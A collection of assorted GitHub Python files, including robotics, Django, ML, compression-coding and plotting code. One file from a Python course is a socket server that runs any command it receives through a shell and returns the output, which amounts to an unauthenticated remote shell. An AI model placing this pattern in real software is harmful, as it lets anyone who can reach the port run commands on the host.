port=PORT)\n\n","repo_name":"ashish493/alphanumeric_recognition","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"26033197231","text":"#!/usr/bin/env python\n\nimport rospy\nfrom std_msgs.msg import Float64\nfrom geometry_msgs.msg import Vector3\n\n\nVx = 0.0\nVy = 0.0\nVW = 0.0\n\nV1 = 0.0\nV2 = 0.0\nV3 = 0.0\nV4 = 0.0\n\nsend = True\n\ndef transform_(msg): \n global Vx\n global Vy\n global Vw\n\n global V1\n global V2\n global V3\n global V4\n global send\n\n Vx = -msg.x\n Vy = msg.y\n Vw = msg.z\n\n V3 = Vy + Vw #V1\n V2 = -Vx + Vw #V2\n V4 = -Vy + Vw #V3\n V1 = Vx + Vw #V4\n\n send = False\n\nrospy.init_node(\"speed_controller\")\n\nsub = rospy.Subscriber(\"/cmd_vel\", Vector3, transform_)\n\nwheel1 = rospy.Publisher(\"/wheel1/command\", Float64, queue_size = 1)\nwheel2 = rospy.Publisher(\"/wheel2/command\", Float64, queue_size = 1)\nwheel3 = rospy.Publisher(\"/wheel3/command\", Float64, queue_size = 1)\nwheel4 = rospy.Publisher(\"/wheel4/command\", Float64, queue_size = 1)\nr = rospy.Rate(4)\nwhile not rospy.is_shutdown():\n\n #while not send:\n send = True\n wheel1.publish(V1)\n wheel2.publish(V2)\n wheel3.publish(V3)\n wheel4.publish(V4)\n r.sleep()","repo_name":"edgarcamilocamacho/larc_2019","sub_path":"dynamixel_controllers/nodes/speed_controller.py","file_name":"speed_controller.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2656037255","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\nclass Comments(models.Model):\n\n\tclass Meta:\n\t\tdb_table = \"comments\"\n\n\t# main fields\n\tcomment = models.TextField(blank=False)\n\tcreated_at = models.DateTimeField(auto_now_add=True)\n\tupdated_at = models.DateTimeField(auto_now=True)\n\n\t#relation fields\n\tpost = models.ForeignKey(\n\t\t'posts.Posts', \n\t\ton_delete=models.CASCADE, \n\t\tnull=True,\n\t\trelated_name=\"comments\"\n\t)\n\tcreated_by = models.ForeignKey(\n\t\tUser, \n\t\ton_delete=models.CASCADE, \n\t\tnull=True\n\t)\n\tupdated_by = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n db_column=\"updated_by_id\",\n null=True,\n blank=True,\n related_name='comments_updated_by'\n )\n\n\tdef __str__(self):\n\t\treturn self.comment","repo_name":"azharrizkip/BlogDjangoAPI","sub_path":"comments/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19341313775","text":"from django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'cookbook.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^', include('recipes.urls')),\n)\n\nif settings.DEBUG:\n # for development only: serve media files\n urlpatterns += patterns('',\n url(r'^media/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT}),\n )\n","repo_name":"keimlink/django-workshop","sub_path":"src/cookbook_tests_pkg/cookbook/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"51"} +{"seq_id":"26036261020","text":"from IreneAPIWrapper.models import User, BiasGame as BiasGameModel, Person\nfrom disnake import AppCmdInter\nfrom disnake.ext import commands\nfrom ..helper import send_message, check_game_input, in_game\nfrom models import BiasGame\n\n\nasync def process_list_bg(\n user_id,\n ctx: commands.Context = None,\n inter: AppCmdInter = None,\n allowed_mentions=None,\n):\n user = await User.get(user_id)\n\n scores = await BiasGameModel.fetch_winners(user_id, limit=15) or {}\n\n results = \"\"\n for score_info in scores.values():\n person_id, wins = score_info[\"personid\"], score_info[\"wins\"]\n person = await Person.get(person_id)\n if not person:\n continue\n results += f\"{str(person.name)} [ID: {person.id}] - {wins} Wins\\n\"\n\n if not results:\n results = \"None\"\n\n await send_message(\n user_id,\n results,\n ctx=ctx,\n inter=inter,\n allowed_mentions=allowed_mentions,\n key=\"list_bg\",\n user=user,\n )\n\n\nasync def process_bg(\n bot,\n user_id,\n bracket_size,\n gender,\n ctx: commands.Context = None,\n inter: AppCmdInter = None,\n allowed_mentions=None,\n):\n user = await User.get(user_id)\n if await in_game(user):\n return await send_message(\n key=\"already_in_game\",\n ctx=ctx,\n inter=inter,\n allowed_mentions=allowed_mentions,\n user=user,\n )\n\n input_check = await check_game_input(\n user=user,\n bracket_size=bracket_size,\n gender=gender,\n )\n\n # inputs did not pass.\n if input_check is not True:\n return await send_message(\n msg=input_check, ctx=ctx, inter=inter, allowed_mentions=allowed_mentions\n )\n\n await send_message(\n bracket_size,\n gender,\n ctx=ctx,\n inter=inter,\n allowed_mentions=allowed_mentions,\n key=\"start_bg\",\n user=user,\n )\n\n game_obj = BiasGame(\n bot,\n bracket_size,\n gender,\n user=user,\n ctx=ctx,\n inter=inter,\n )\n\n await game_obj.start()\n","repo_name":"MujyKun/IreneBot","sub_path":"cogs/biasgame/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"51"} +{"seq_id":"26901469927","text":"#!/usr/bin/python3.6\nimport heapq\nfrom collections import defaultdict\nfrom functools import reduce\nfrom itertools import product\nfrom math import log, ceil\nfrom pprint import pprint\nfrom string import ascii_lowercase\n\n\ndef to_probabilities(src):\n letters, count = zip(*src)\n probs = list(map(lambda x: float(x) / sum(count), count))\n return list(zip(letters, probs))\n\n\ndef source(str):\n d = defaultdict(lambda: 0)\n for c in str:\n d[c] += 1\n return list(d.items())\n\n\ndef source_extension(src, k):\n src = dict(to_probabilities(src))\n\n letters = list(zip(*src))[0]\n words = [''.join(i) for i in list(product(letters, repeat=k))]\n\n d = {}\n for w in words:\n p = 1\n for c in w:\n p *= src[c]\n d[w] = p\n\n return list(d.items())\n\n\ndef entropy_source(src):\n src = to_probabilities(src)\n\n H = 0\n for c, p in src:\n H += p * log(1 / p, 2)\n\n return H\n\n\ndef mean_length(C, probs):\n L = map(lambda x: len(x[1]), C)\n return reduce(lambda x, y: x + y[0] * y[1], zip(probs, L), 0)\n\n\ndef shannon_code(src):\n src = to_probabilities(src)\n src = sorted(src, key=lambda x: x[1], reverse=True)\n\n letters, probs = map(list, zip(*src))\n L = list(map(lambda x: ceil(log(1 / x, 2)), probs)) # shannon code\n\n C = []\n q = ['']\n for n in range(max(L) + 1):\n while L and L[0] == n:\n L.pop(0)\n x = q.pop(0)\n a = letters.pop(0)\n C.append((a, x))\n else:\n aux = []\n for x in q:\n aux.append(x + '0')\n aux.append(x + '1')\n q = aux\n\n return C, mean_length(C, probs)\n\n\ndef balanced_division(src):\n A = []\n B = list(src)\n diff = -reduce(lambda x, y: x + y[1], src, 0) # diff = sum(A)-sum(B)\n while abs(diff + 2 * B[0][1]) < abs(diff):\n x = B.pop(0)\n A.append(x)\n diff += 2 * x[1] # diff = (sum(A)+x)-(sum(B)-x) = diff + 2*x\n\n return A, B\n\n\ndef shannon_fano_code1(src, x):\n if len(src) == 1:\n return [(src[0][0], x)]\n else:\n A, B = balanced_division(src)\n\n CA = shannon_fano_code1(A, x + '0')\n CB = shannon_fano_code1(B, x + '1')\n\n return CA + CB\n\n\ndef shannon_fano_code(src):\n src = to_probabilities(src)\n src = sorted(src, key=lambda x: x[1], reverse=True)\n\n C = shannon_fano_code1(src, '')\n probs = map(lambda x: x[1], src)\n\n return C, mean_length(C, probs)\n\n\ndef build_code(tree, x):\n if len(tree) == 1:\n return [(tree[0], x)]\n else:\n CA = build_code(tree[0], x + '0')\n CB = build_code(tree[1], x + '1')\n return CA + CB\n\n\nclass Node:\n def __init__(self, key, value):\n self.key = key\n self.value = value\n\n def __lt__(self, other):\n if self.key == other.key:\n return True\n else:\n return self.key < other.key\n\n\ndef huffman_code(src):\n src = to_probabilities(src)\n src = sorted(src, key=lambda x: x[1])\n\n q = list(map(lambda x: Node(x[1], [x[0]]), src))\n heapq.heapify(q)\n\n while len(q) > 1:\n x = heapq.heappop(q)\n y = heapq.heappop(q)\n heapq.heappush(q, Node(x.key + y.key, [x.value, y.value]))\n tree = heapq.heappop(q).value\n\n C = build_code(tree, '')\n\n probs = []\n src = dict(src)\n for x in map(lambda x: x[0], C):\n probs.append(src[x])\n\n return C, mean_length(C, probs)\n\n\n'''\nwith open('../data/moby_dick.txt') as f:\n txt = f.read()\n txt = list(filter(lambda c: c in ascii_lowercase + ' ', txt.lower()))\n src = source(txt)\n # pprint(sorted(src,key=lambda x:x[1],reverse=True))\n # pprint(sorted(source_extension(src, 2),key=lambda x:x[1],reverse=True))\n print('H = ' + str(entropy_source(src)))\n # print('C = ' + pformat(shannon_code(src)))\n # pprint(shannon_fano_code(src))\n # pprint(shannon_fano_code([('a1',0.36),('a2',0.18),('a3',0.18),('a4',0.12),('a5',0.09),('a6',0.07)]))\n pprint(huffman_code(src))\n'''\n\n# src = [('0',0.9),('1',0.1)]\n# src = source_extension(src,2)\nsrc = source('setzejutgesdunjutjatmengenfetgedunpenjat')\npprint(shannon_code(src))\npprint(shannon_fano_code(src))\npprint(huffman_code(src))\n","repo_name":"oscmansan/DataCompression","sub_path":"lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9172139998","text":"import torch\nfrom torch import nn\n\nfrom .fc_model import FCEncoder, FCDecoder, FCClassifier\nfrom .pooling_layer import AvgPooling, LastPooling, LinearSeqAttnPooling, NoPooling\nfrom .rnn_model import RNNEncoder, RNNDecoder\n\n\nclass MultiTask_Model(nn.Module):\n\tdef __init__(self, encoder_type, decoder_type,pool_type, params):\n\t\tsuper(MultiTask_Model, self).__init__()\n\n\t\tself.encoder_type = encoder_type\n\t\tself.pool_type = pool_type\n\t\tself.decoder_type = decoder_type\n\t\tself.params = params\n\t\tself.train_param=self.params.train_param()\n\t\tself.traj_attn_intent_dim = self.train_param['traj_attn_intent_dim']\n\n\t\tself.encoder = self._create_encoder(self.encoder_type)\n\t\tself.enc_out_units = self.encoder.output_units\n\n\t\tself.decoder = self._create_decoder(self.decoder_type)\n\n\t\tself.clf_pool = self._create_pooling(self.pool_type)\n\t\tself.classifier = self._create_decoder(decoder_type='classifier')\n\n\t\tif self.traj_attn_intent_dim>0:\n\t\t\tself.attn_pool = self._create_pooling(self.pool_type,input_size=self.traj_attn_intent_dim)\n\n\n\tdef _create_encoder(self, encoder_type):\n\t\t# create encoder\n\t\tif encoder_type == 'rnn':\n\t\t\trnn_param = self.params.encode_rnn_param()\n\t\t\tencoder = RNNEncoder(**rnn_param)\n\t\telse:\n\t\t\tfc_param = self.params.encode_fc_param()\n\t\t\tencoder = FCEncoder(**fc_param)\n\t\treturn encoder\n\n\tdef _create_pooling(self, pool_type,input_size=None):\n\t\tif input_size is None:\n\t\t\tinput_size=self.enc_out_units\n\t\tif pool_type == 'mean' or pool_type == 'avg':\n\t\t\tpool = AvgPooling()\n\t\telif pool_type == 'last':\n\t\t\tpool = LastPooling()\n\t\telif pool_type == 'linear_attn':\n\t\t\tpool = LinearSeqAttnPooling(input_size=input_size)\n\t\telse:\n\t\t\tpool = NoPooling()\n\t\treturn pool\n\n\tdef _create_decoder(self, decoder_type):\n\t\tif decoder_type == 'rnn':\n\t\t\trnn_params = self.params.decode_rnn_param()\n\t\t\tdecoder = RNNDecoder(encoder_output_units=self.enc_out_units,traj_attn_intent_dim=self.traj_attn_intent_dim,\n\t\t\t **rnn_params)\n\t\telif decoder_type == 'classifier':\n\t\t\tclf_params = self.params.classifier_fc_param()\n\t\t\tdecoder = FCClassifier(encoder_output_units=self.enc_out_units,traj_attn_intent_dim=self.traj_attn_intent_dim,\n\t\t\t **clf_params)\n\t\telse:\n\t\t\tfc_param = self.params.decode_fc_param()\n\t\t\tdecoder = FCDecoder(encoder_output_units=self.enc_out_units,traj_attn_intent_dim=self.traj_attn_intent_dim,\n\t\t\t **fc_param)\n\n\t\treturn decoder\n\n\tdef forward(self, src_seq,start_decode=None,encoder_mask=None):\n\n\t\tenc = self.encoder(src_seq)\n\t\tencoder_out, encoder_state= enc\n\n\t\tif self.decoder_type == 'rnn':\n\t\t\tout_traj, hidden_out_traj = self.decoder(enc, start_decode,encoder_mask=encoder_mask)\n\t\telse:\n\t\t\tout_traj,hidden_out_traj = self.decoder(encoder_out)\n\n\n\t\tclf_inp = self.clf_pool(encoder_out,x_mask=encoder_mask)\n\t\tif self.traj_attn_intent_dim>0:\n\t\t\thidden_out_traj = self.attn_pool(hidden_out_traj)\n\t\t\tclf_inp = torch.cat([clf_inp, hidden_out_traj], dim=1)\n\t\tout_intent,_ = self.classifier(clf_inp)\n\n\t\treturn out_traj, out_intent\n\ndef create_model(params):\n\ttrain_params = params.train_param()\n\tif train_params['init_model'] is not None:\n\t\tmodel = torch.load(train_params['init_model'])\n\t\tprint('load model', train_params['init_model'])\n\telse:\n\t\tmodel = MultiTask_Model(\n\t\t\tencoder_type=train_params['encoder'],\n\t\t\tpool_type=train_params['pool_type'],\n\t\t\tdecoder_type=train_params['decoder'],\n\t\t\tparams=params)\n\n\tparam_num = sum([p.data.nelement() for p in model.parameters()])\n\tprint(\"Number of model parameters: {} M\".format(param_num / 1024. / 1024.))\n\tmodel.train()\n\n\treturn model\n","repo_name":"intelligent-control-lab/MEKF_MAME","sub_path":"models/model_factory.py","file_name":"model_factory.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"51"} +{"seq_id":"27846875812","text":"\"\"\"\n客户端发送要执行的命令到服务器,服务器执行完后将结果返回给客户端,\n客户端拿到结果后呈现给用户。\n\"\"\"\nimport socket\nimport subprocess\n\n\nsk = socket.socket()#默认tcp传输\nsk.bind((\"127.0.0.1\", 8071))\nsk.listen()\nconn, addr = sk.accept()\nwhile 1:\n\tcmd = conn.recv(1024).decode(\"utf-8\")\n\tr = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\tstdout = r.stdout.read() # 正确结果,byte类型\n\tstderr = r.stderr.read() # 错误结果,byte类型\n\tif not stderr:\n\t\tconn.send(stdout)\n\telse:\n\t\tconn.send(stderr)\nconn.close()\nsk.close()\n","repo_name":"dengyungao/python","sub_path":"老男孩python全栈开发第14期/python基础知识(day1-day40)/网络编程/连接到远程服务器执行命令并返回结果/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"39508028576","text":"class Solution:\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n while m > 0 and n > 0:\n if nums1[m-1] <= nums2[n-1]:\n nums1[m+n-1] = nums2[n-1]\n n -= 1\n else:\n nums1[m+n-1] = nums1[m-1]\n m -= 1\n\n if m == 0 and n > 0:\n nums1[:n] = nums2[:n]\n\n","repo_name":"jeremybaby/leetcode","sub_path":"Python/088_merge_sorted_array.py","file_name":"088_merge_sorted_array.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"33624600459","text":"#!/usr/bin/python3\n\nfrom collections import Counter\nimport subprocess\nimport json\nimport time\nimport sys\nimport graphyte\nimport math\n\n\ndef cli(cmd='uname'):\n result = subprocess.run(cmd.split(), stdout=subprocess.PIPE)\n return(result.stdout.decode('utf-8').strip())\n\n# Load sensitive config\ntry:\n with open('/etc/testnet_config.json') as config_file:\n config = json.load(config_file)\n testnet = config['testnet']\n\nexcept IOError as error:\n print('Error opening secrets config:', error)\n sys.exit(1)\n\nstatus = cli('mina client status -json')\nblock = json.loads(status)['blockchain_length']\nprint('Block:', block)\n\nsnark_job_list = json.loads(cli('mina advanced snark-job-list'))\n\nleavestotal= Counter()\n\ntreecount = 0\nfor tree in snark_job_list:\n print('=' * 70)\n print('🌲:', treecount, 'Size:', len(tree))\n treecount += 1\n leavesbytree = Counter()\n\n output_line = ''\n for job in tree:\n (slotid, data) = job\n\n # merge proofs\n if 'M' in data:\n if len(data['M']) > 0:\n output_line += str(len(data['M']))\n else:\n output_line += '_'\n # transactions proofs (leaves)\n elif 'B' in data:\n if len(data['B']) > 0:\n leavesbytree['occupied'] += 1\n leavestotal['occupied'] += 1\n\n if 'Status' in data['B'][2]:\n if data['B'][2]['Status'] == 'Todo':\n output_line += 'b'\n elif data['B'][2]['Status'] == 'Done':\n output_line += 'B'\n else:\n output_line += '?'\n\n else:\n leavesbytree['empty'] += 1\n leavestotal['empty'] += 1\n output_line += '_'\n leavesbytree['total'] += 1\n leavestotal['total'] += 1\n else:\n # should never get here\n print('fouind no match:', data)\n\n # Print lines on powers of 2\n if (not math.log(slotid + 2, 2) % 1):\n # print a new line for a new level of tree\n print(output_line.center(int(len(tree)/2)))\n output_line = ''\n\n\n\n print(leavesbytree)\nprint('TOTALS:', leavestotal)","repo_name":"MinaProtocol/mina","sub_path":"automation/scripts/get-snark-job-list.py","file_name":"get-snark-job-list.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":1846,"dataset":"github-code","pt":"51"} +{"seq_id":"25815059633","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom captcha.image import ImageCaptcha\nfrom Web.DatabaseHub import VerificationCode\nfrom django.http import JsonResponse,HttpResponse\nfrom ClassCongregation import ErrorLog,randoms\nfrom Web.Workbench.LogRelated import RequestLogRecord\n\n\ndef GenerateVerificationCode(request):#生成验证码函数\n RequestLogRecord(request, request_api=\"get_verification_code\")\n if request.method == \"GET\":\n try:\n random_verification_code = randoms().LowercaseAndNumbers(6)#获取小写的字符串\n random_verification_code_key=randoms().result(250)#生成验证码相关联的key\n picture_bitstream = ImageCaptcha().generate(random_verification_code).read()#获取图片比特流\n VerificationCode().Write(code=random_verification_code,verification_code_key=random_verification_code_key)#把值写入到数据库中\n result=HttpResponse(picture_bitstream)#把图片比特流复制给返回包\n result['VerificationCodeKey'] = random_verification_code_key#把值传到返回包的头中\n result['Access-Control-Expose-Headers']=\"VerificationCodeKey\"#添加头内容保证前端能够获取到值\n return result\n except Exception as e:\n ErrorLog().Write(e)\n return JsonResponse({'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, })\n else:\n return JsonResponse({'message': '请使用GET请求', 'code': 500, })\n\n","repo_name":"Ascotbe/Medusa","sub_path":"Web/BasicFunctions/VerificationCode.py","file_name":"VerificationCode.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":2045,"dataset":"github-code","pt":"51"} +{"seq_id":"75081514718","text":"from fastapi import FastAPI,Security\nimport appConfig \nfrom api import api_router\nfrom fastapi_azure_auth.auth import SingleTenantAzureAuthorizationCodeBearer\n\n\napp = app = FastAPI(\n swagger_ui_oauth2_redirect_url='/oauth2-redirect',\n swagger_ui_init_oauth={\n 'usePkceWithAuthorizationCodeGrant': True,\n 'clientId': appConfig.CLIENT_ID\n },\n)\n\nazure_scheme = SingleTenantAzureAuthorizationCodeBearer(\n app_client_id=appConfig.CLIENT_ID,\n tenant_id=appConfig.TENANT_ID,\n scopes={\n f'api://{appConfig.CLIENT_ID}/User-Read': 'User-Read',\n }\n)\n\n\napp.include_router(api_router, prefix=\"/api\",dependencies=[Security(azure_scheme, scopes=['User-Read'])])\n","repo_name":"athempeed/AzureAD-Authentication-PythonAPI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5762452022","text":"from hnswlib_hnsw import HNSWIndex\nfrom faiss_ivf import FaissIvfIndex\nfrom data_module import Data\n\n\nclass Index:\n def __init__(self):\n self.ivf_flat = FaissIvfIndex()\n self.hnsw = HNSWIndex()\n\n self.data = Data()\n self.vectors_path = \"./data/vectors.csv\"\n self.key_attr = 'name'\n self.vector_attr = 'vector'\n self.data.init_vectors(\n self.vectors_path, self.key_attr, self.vector_attr)\n self.vectors_count = self.data.vectors_count\n\n self.set_index_type('ivf_flat')\n self.index.set_vectors(self.data.vectors)\n\n def set_index_type(self, index_type):\n if index_type == 'hnsw':\n self.index_type = 'hnsw'\n self.index = self.hnsw\n elif index_type == 'ivf_flat':\n self.index_type = 'ivf_flat'\n self.index = self.ivf_flat\n else:\n raise RuntimeError('Index Name Error')\n\n if self.data.has_data:\n self.index.set_vectors(self.data.vectors)\n\n def set_data(self, data, key_attr='name', vector_attr='vector'):\n self.data.set_data(data, key_attr, vector_attr)\n self.index.set_vectors(self.data.train_vectors)\n\n def set_search_params(self, params):\n self.index.set_search_params(params)\n\n def set_build_params(self, params):\n self.index.set_build_params(params)\n\n def get_search_vis_data(self, p):\n vis_res = self.index.get_search_vis_data(p)\n self.data.map_key(vis_res)\n return vis_res\n\n def search_by_id(self, id):\n # if not self.data.has_data:\n # return None\n vis_res = self.index.get_search_vis_data(self.data.vectors[id])\n # self.data.map_keys(vis_res)\n return vis_res\n\n def get_corase_vis_data(self, id):\n if self.index_type == 'ivf_flat':\n return self.index.get_corase_vis_data()\n\n else:\n return []\n","repo_name":"zilliztech/vector-index-visualization-tool","sub_path":"server/index/index_manage.py","file_name":"index_manage.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"51"} +{"seq_id":"30846346859","text":"#!/usr/bin/env python3\n\"\"\"\nImplement a get_hyper method that takes the same arguments\n(and defaults) as get_page and returns a dictionary\ncontaining the following key-value pairs:\n page_size: the length of the returned dataset page\n page: the current page number\n data: the dataset page (equivalent to return from previous task)\n next_page: number of the next page, None if no next page\n prev_page: number of the previous page, None if no previous page\n total_pages: the total number of pages in the dataset as an integer\nMake sure to reuse get_page in your implementation.\nYou can use the math module if necessary.\n\"\"\"\nimport csv\nimport math\nfrom typing import List\n\n\nclass Server:\n \"\"\"\n Server class to paginate a database of popular baby names.\n \"\"\"\n DATA_FILE = \"Popular_Baby_Names.csv\"\n\n def __init__(self):\n self.__dataset = None\n\n def dataset(self) -> List[List]:\n \"\"\"Cached dataset\n \"\"\"\n if self.__dataset is None:\n with open(self.DATA_FILE) as f:\n reader = csv.reader(f)\n dataset = [row for row in reader]\n self.__dataset = dataset[1:]\n\n return self.__dataset\n\n def index_range(self, page: int, page_size: int) -> tuple:\n \"\"\"\n Return a tuple of size two containing a start index\n and an end index corresponding to the range of indexes\n to return in a list for those particular pagination parameters.\n \"\"\"\n start_index = (page - 1) * page_size\n end_index = start_index + page_size\n return (start_index, end_index)\n\n def get_page(self, page: int = 1, page_size: int = 10) -> List[List]:\n \"\"\"\n Takes two integer arguments\n and return the appropriate page of the dataset.\n \"\"\"\n assert type(page) == int or type(page_size) == int\n assert page > 0 or page_size > 0\n start, end = self.index_range(page, page_size)\n data = self.dataset()\n list_result = []\n\n if start >= len(data):\n return list_result\n return data[start:end]\n\n def get_hyper(self, page: int, page_size: int) -> dict:\n \"\"\"\n Returns a dictionary containing a set of key-value pairs.\n \"\"\"\n data = self.get_page(page, page_size)\n size_all_pages = math.ceil(len(self.dataset()) / page_size)\n next_page = page + 1 if page + 1 < size_all_pages else None\n prev_page = page - 1 if page > 1 else None\n\n hyper_data = {\n \"page_size\": len(data),\n \"page\": page,\n \"data\": data,\n \"next_page\": next_page,\n \"prev_page\": prev_page,\n \"total_pages\": size_all_pages,\n }\n\n return hyper_data\n","repo_name":"jbocane6/holbertonschool-backend","sub_path":"0x00-pagination/2-hypermedia_pagination.py","file_name":"2-hypermedia_pagination.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"39727532624","text":"from scipy.interpolate import interp1d\nfrom scipy.integrate import quad\nimport matplotlib as plt\nimport numpy as np\n\n\nactual = [1, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0]\npredict = [0.7, 0.2, 0.9, 0.75, 0.5, 0.9, 0.7, 0.63, 0.1, 0.25, 0.36, 0.05, 0.9, 0.3, 0.24]\n\ndata = zip(actual, predict)\nsorted_data = sorted(data, key=lambda d: d[1], reverse=True)\nsorted_actual = [d[0] for d in sorted_data]\n\ncumulative_actual = np.cumsum(sorted_actual) / sum(actual)\ncumulative_index = np.arange(1, len(cumulative_actual)+1) / len(predict)\ncumulative_actual_perfect = np.cumsum(sorted(actual, reverse=True)) / sum(actual)\n\nx_values = [0] + list(cumulative_index)\ny_values = [0] + list(cumulative_actual)\ny_values_perfect = [0] + list(cumulative_actual_perfect)\n\nf1, f2 = interp1d(x_values, y_values), interp1d(x_values, y_values_perfect)\nS_pred = quad(f1, 0, 1, points=x_values)[0] - 0.5\nS_actual = quad(f2, 0, 1, points=x_values)[0] - 0.5\n\nfig, ax = plt.subplots(nrows=1,ncols=2, sharey=True, figsize=(14, 7))\nax[0].plot(x_values, y_values, lw = 2, color = 'blue', marker='x')\nax[0].fill_between(x_values, x_values, y_values, color = 'blue', alpha=0.1)\nax[0].text(0.4,0.2,'S = {:0.4f}'.format(S_pred))\nax[1].plot(x_values, y_values_perfect, lw = 2, color = 'green', marker='x')\nax[1].fill_between(x_values, x_values, y_values_perfect, color = 'green', alpha=0.1)\nax[1].text(0.4,0.2,'S = {:0.4f}'.format(S_actual),fontsize = 28)\n\nfor i in range(2):\n ax[i].plot([0,1],[0,1],linestyle = '--',lw = 2,color = 'black')\n ax[i].set(title='Коэффициент Джини', xlabel='Кумулятивная доля объектов',\n ylabel='Кумулятивная доля истинных классов', xlim=(0, 1), ylim=(0, 1))\nplt.show();","repo_name":"Zagryazhskaya/Machine-learning","sub_path":"Gini_koef.py","file_name":"Gini_koef.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43154944971","text":"def find_sum_integers(number):\r\n sum = 0\r\n number = str(number)\r\n for digit in number:\r\n sum += int(digit)\r\n return sum\r\n\r\ntest_case = int(input())\r\n\r\nwhile test_case != 0:\r\n target = find_sum_integers(test_case)\r\n done = False\r\n counter = 11\r\n while not done:\r\n if find_sum_integers(test_case * counter) == target:\r\n print(counter)\r\n done = True\r\n else:\r\n counter += 1\r\n test_case = int(input())\r\n","repo_name":"mg-blvd/Kattis_Solutions","sub_path":"TheEasiestProblemIsThisOne.py","file_name":"TheEasiestProblemIsThisOne.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16079226023","text":"'''\nInput: s = \"abcabcbb\"\nOutput: 3\nInput: s = \"bbbbb\"\nOutput: 1\nInput: s = \"pwwkew\"\nOutput: 3\n'''\nclass Solution:\n def lengthOfLongestSubstring(self, s): \n substring = []\n longest = 0\n for char in s:\n if char not in substring:\n substring.append(char)\n if len(substring) > longest:\n longest = len(substring)\n else:\n repeat_index = substring.index(char)\n substring = substring[repeat_index+1:]\n substring.append(char)\n return longest\n \nprint(Solution().lengthOfLongestSubstring(s = \"bbbbb\"))","repo_name":"matthewjkang/Leetcode","sub_path":"[3]LSWRC.py","file_name":"[3]LSWRC.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70574841440","text":"## ###############################################################\n## MODULES\n## ###############################################################\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom mayavi import mlab\n\nfrom MyAlgorithms.PlotIsosurface import genPointCloud\nfrom MyAlgorithms.AStar3D import genAdjDict_parallel, aStar\n\n\n## ###############################################################\n## HELPER FUNCTIONS\n## ###############################################################\ndef gyroid(x, y, z):\n return np.cos(x) * np.sin(y) + np.cos(y) * np.sin(z) + np.cos(z) * np.sin(x)\n\ndef printPoint(point, pre=\"\"):\n print(f\"{pre}[{point[0]:.3f}, {point[1]:.3f}, {point[2]:.3f}],\")\n\n\n## ###############################################################\n## PROGRAM MAIN\n## ###############################################################\ndef main():\n start_time = time.time()\n ## generate issurface data\n print(\"Generating point cloud...\")\n verts, faces, normals = genPointCloud(implicit_func=gyroid, res=30)\n print(\"Computing adjacency dictionary...\")\n # dict_adj = genAdjDict(verts, faces)\n dict_adj = genAdjDict_parallel(verts.shape[0], faces.shape[0], faces)\n ## plot isosurface\n mlab.triangular_mesh(verts[:,0], verts[:,1], verts[:,2], faces)\n ## compute edge points\n list_vi = []\n for vi in range(len(verts)):\n if len(dict_adj[vi]) < 4:\n list_vi.append(vi)\n mlab.points3d(verts[vi,0], verts[vi,1], verts[vi,2])\n printPoint(verts[vi])\n ## show canvas\n mlab.show()\n end_time = time.time()\n print(f\"Elapsed time: {end_time - start_time:.3f} seconds\")\n\n\n## ###############################################################\n## PROGRAM ENTRY POINT\n## ###############################################################\nif __name__ == \"__main__\":\n main()\n\n\n## END OF 